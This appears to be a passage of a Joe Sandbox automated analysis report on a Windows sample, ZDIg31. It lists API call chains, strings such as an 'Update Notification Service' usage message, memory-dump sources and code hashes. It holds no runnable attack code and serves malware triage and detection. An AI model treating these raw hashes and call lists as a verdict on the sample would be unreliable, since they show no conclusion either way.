                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction ID: 37d4691931477913eff183039e1e941a4c1884109e02130dfca3ae4d99c018e8
                                      • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction Fuzzy Hash: DB31C461F2A64A91FE75DB46A4005B93398BF49B70F594635ED1D073B0EE3CE645C320
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction ID: ed1908ae324be18bf509dfe13a9ad8f7c280d2afdc070034afd03f1fe71536b9
                                      • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction Fuzzy Hash: DD219DA0F2C69E49FA78A33D555913973829F487B0F004734E93F07BF6EE2CA6419220
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                      • String ID: CONOUT$
                                      • API String ID: 3230265001-3130406586
                                      • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction ID: 1df180611dbadc88ee6ff1a7fb368753f52d7f4ef6254b92b70438ef7e8cb58c
                                      • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction Fuzzy Hash: 79118E21B28A4586E7609B52E84432973A4FB88FE8F004234EA5E87BB4CF3CD644D754
                                      APIs
                                      • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                      • CreateEventW.KERNEL32 ref: 00000001400012C0
                                        • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                        • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                        • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                        • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                        • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                        • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                        • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                        • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                        • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                        • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                        • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                      • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                      • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                        • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                        • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                        • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                        • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                        • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                        • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                      • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                      • String ID: vseamps
                                      • API String ID: 3197017603-3944098904
                                      • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                      • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Messagesprintf_s
                                      • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                      • API String ID: 2642950106-3610746849
                                      • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                      • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                      • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                      • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                      • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                      • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                      • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                      • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 319667368-0
                                      • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                      • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                      • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                      APIs
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                        • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 1390108997-0
                                      • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                      • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                      • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 3523768491-393685449
                                      • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction ID: 0347cee8af53e4cfca73f8288bfc8d5b1e9e39f72b434224e3a14c002942f734
                                      • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                      • Instruction Fuzzy Hash: 20E170B3D2878A8AE7609F64D4803BD7BA0EB45748F144139DA8D57776CF38E681C750
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00007FFE9B908BC9,?,?,?,?,00007FFE9B908C14), ref: 00007FFE9B9095CB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B908BC9,?,?,?,?,00007FFE9B908C14), ref: 00007FFE9B909601
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B908BC9,?,?,?,?,00007FFE9B908C14), ref: 00007FFE9B90962E
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B908BC9,?,?,?,?,00007FFE9B908C14), ref: 00007FFE9B90963F
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE9B908BC9,?,?,?,?,00007FFE9B908C14), ref: 00007FFE9B909650
                                      • SetLastError.KERNEL32(?,?,?,00007FFE9B908BC9,?,?,?,?,00007FFE9B908C14), ref: 00007FFE9B90966B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction ID: e8c5402b19545e2bc263dc38f0790f478e9c599318943e06592fa5eb05db7235
                                      • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                      • Instruction Fuzzy Hash: 2D11AFA0F2D24E4AFA78A339559913933929F487B0F408334EC3F077F6DE2CA6419220
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                      • String ID:
                                      • API String ID: 3326452711-0
                                      • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                      • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                      • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                      • API String ID: 2984211723-1229430080
                                      • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                      • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                      • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction ID: 40ff9e51b17489211c17702326fed8fdc19e2208aff24381264702489f8d582a
                                      • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                      • Instruction Fuzzy Hash: 9AF06D65B39B0A91EB349B64E44433A7360AF89BA5F540335CA6E466F4CF3CD249D360
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                      • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                      • ExitProcess.KERNEL32 ref: 0000000140008545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: AddressExitHandleModuleProcProcess
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 75539706-1276376045
                                      • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                      • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                      • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction ID: 0b37c94ac7e63ba775f4209b6e5602461111e2aa8e57febbac23baf1b1ca7b82
                                      • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction Fuzzy Hash: 12B1BEA2E2E68A82EE75DB15954133873F1AF54B84F098839DE4C077B5DE3CE6528360
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: FileInfoSleepStartupType
                                      • String ID:
                                      • API String ID: 1527402494-0
                                      • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                      • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
